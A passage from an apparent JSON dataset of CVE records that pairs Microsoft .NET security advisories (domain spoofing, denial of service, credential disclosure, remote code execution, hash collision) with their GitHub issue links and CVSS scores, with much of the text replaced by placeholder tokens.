APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG | APITAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2019-0657",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/97",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/97",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2019-02-12T18:21:22Z",
        "description": "Microsoft Security Advisory CVETAG : .NET Core Domain Spoofing Vulnerability. APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a domain spoofing vulnerability in .NET Framework and .NET Core which causes the meaning of a URI to change when International Domain Name encoding is applied. An attacker who successfully exploited the vulnerability could redirect a URI. The security update addresses the vulnerability by disallowing certain Unicode characters from the URI. Discussion Discussion for this issue can be found at URLTAG NUMBERTAG APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG or NUMBERTAG based application that uses the FILETAG package with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG Any .NET Core NUMBERTAG or NUMBERTAG based application that uses the FILETAG package with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? Applications that use APITAG APITAG is distributed as part of the .NET Core NUMBERTAG runtime. To check the currently installed runtimes, open a command prompt and run the APITAG command. If you have a NUMBERTAG or greater runtime installed, you'll see output like the following; ERRORTAG If your host version is NUMBERTAG and the highest APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. If your host version is NUMBERTAG and the highest NUMBERTAG APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. You will not see SDK versions if you have only installed the runtime. Applications not using APITAG The affected assembly is also available separately as a APITAG package. If you are not using APITAG you may still be affected if you are referencing the packages listed above. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG How do I fix the issue? Updating the version of APITAG If your host version is a NUMBERTAG host you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . If your host version is a NUMBERTAG you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-1721",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/175",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/175",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2021-02-09T18:15:20Z",
        "description": "Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists when creating HTTPS web request during NUMBERTAG certificate chain building. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG application running on .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG or lower, respectively. Please note that .NET Core NUMBERTAG is out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG from FILETAG .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-1721",
        "Issue_Url_old": "https://github.com/dotnet/runtime/issues/48067",
        "Issue_Url_new": "https://github.com/dotnet/runtime/issues/48067",
        "Repo_new": "dotnet/runtime",
        "Issue_Created_At": "2021-02-09T18:30:29Z",
        "description": "Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists when creating HTTPS web request during NUMBERTAG certificate chain building. Announcement Announcement for this issue can be found at URLTAG APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG application running on .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG or lower, respectively. Please note that .NET Core NUMBERTAG is out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG from FILETAG .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2021-41355",
        "Issue_Url_old": "https://github.com/dotnet/runtime/issues/60301",
        "Issue_Url_new": "https://github.com/dotnet/runtime/issues/60301",
        "Repo_new": "dotnet/runtime",
        "Issue_Created_At": "2021-10-12T17:02:13Z",
        "description": "Microsoft Security Advisory CVETAG | .NET Core Information Disclosure Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Information Disclosure Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A Information Disclosure vulnerability exists in .NET where APITAG may send credentials in plain text on Linux. Announcement Announcement for this issue can be found at URLTAG APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET application that uses APITAG with a vulnerable version listed below on system based on Linux. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG or lower NUMBERTAG APITAG APITAG How do I know if I am affected? If you are using a package version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please update to the latest version URLTAG of the affected software affected software . Other Information Reporting Security Issues If you have found a potential security issue in .NET, please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.7,
        "impactScore": 3.6,
        "exploitabilityScore": 2.1
    },
    {
        "CVE_ID": "CVE-2020-0606",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/149",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/149",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2020-01-14T18:01:12Z",
        "description": "Microsoft Security Advisory CVETAG : .NET Core Remote Code Execution Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Remote Code Execution Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Core. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Core checks the source markup of a file. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG application running on .NET Core NUMBERTAG or NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software you are exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue please install the latest version of .NET Core. If you have multiple versions of .NET Core installed you will need to install multiple runtimes, or SDKs depending on what you have installed. You can list the versions you have installed by running the APITAG command. You will see output like the following; ERRORTAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG For machines running .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG from FILETAG If you have both NUMBERTAG and NUMBERTAG installed, you need to install the updates for both versions. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Acknowledgments Soroush Dalili ( MENTIONTAG URLTAG External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-0875",
        "Issue_Url_old": "https://github.com/dotnet/announcements/issues/62",
        "Issue_Url_new": "https://github.com/dotnet/announcements/issues/62",
        "Repo_new": "dotnet/announcements",
        "Issue_Created_At": "2018-03-13T17:01:52Z",
        "description": "Microsoft Security Advisory CVETAG : Hash Collison can cause Denial of Service. Microsoft Security Advisory CVETAG : Hash Collison can cause Denial of Service Executive Summary Microsoft is releasing this security advisory to provide information about a vulnerability in the public versions of .NET Core NUMBERTAG and NUMBERTAG including other minor and patch releases). This advisory also provides guidance on what developers can do to update their applications correctly. Microsoft is aware of a security vulnerability in the public versions of .NET Core where a malicious file or web request could cause a denial of service APITAG attack. System administrators are advised to update their .NET Core runtimes to versions NUMBERTAG or NUMBERTAG Developers are advised to update their .NET Core SDK to versions NUMBERTAG or NUMBERTAG Discussion Use TBD for discussion of this advisory. Mitigation Factors None Affected Software Any application running against .NET Core NUMBERTAG or lower versions NUMBERTAG or lower minor versions or NUMBERTAG or lower minor versions is affected. Advisory FAQ How do I know if I am affected? Any application running against .NET Core NUMBERTAG or lower versions NUMBERTAG or lower minor versions or NUMBERTAG or lower minor versions is affected. A complete list of runtimes can be discovered by performing a directory listing in the install root directories. The default root directories are listed in the following table: | Operating System | Location | | | | | Windows | APITAG | | APITAG | APITAG | | Supported Linux platforms | APITAG | Each runtime version is installed in its own directory, where the directory name is the version number. If you don't have a directory for NUMBERTAG and NUMBERTAG then any applications targeting the respective major/minor versions NUMBERTAG or NUMBERTAG or NUMBERTAG of .NET Core are vulnerable. Additionally, if you've deployed self contained applications targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. How do I fix my affected application? Applications can be fixed by installing the latest .NET Core runtimes or SDKs. Typically, application servers only have runtime packages installed and developer machines have the SDKs installed. Installers for the runtimes can be downloaded from the FILETAG . .NET Core NUMBERTAG SDK installs 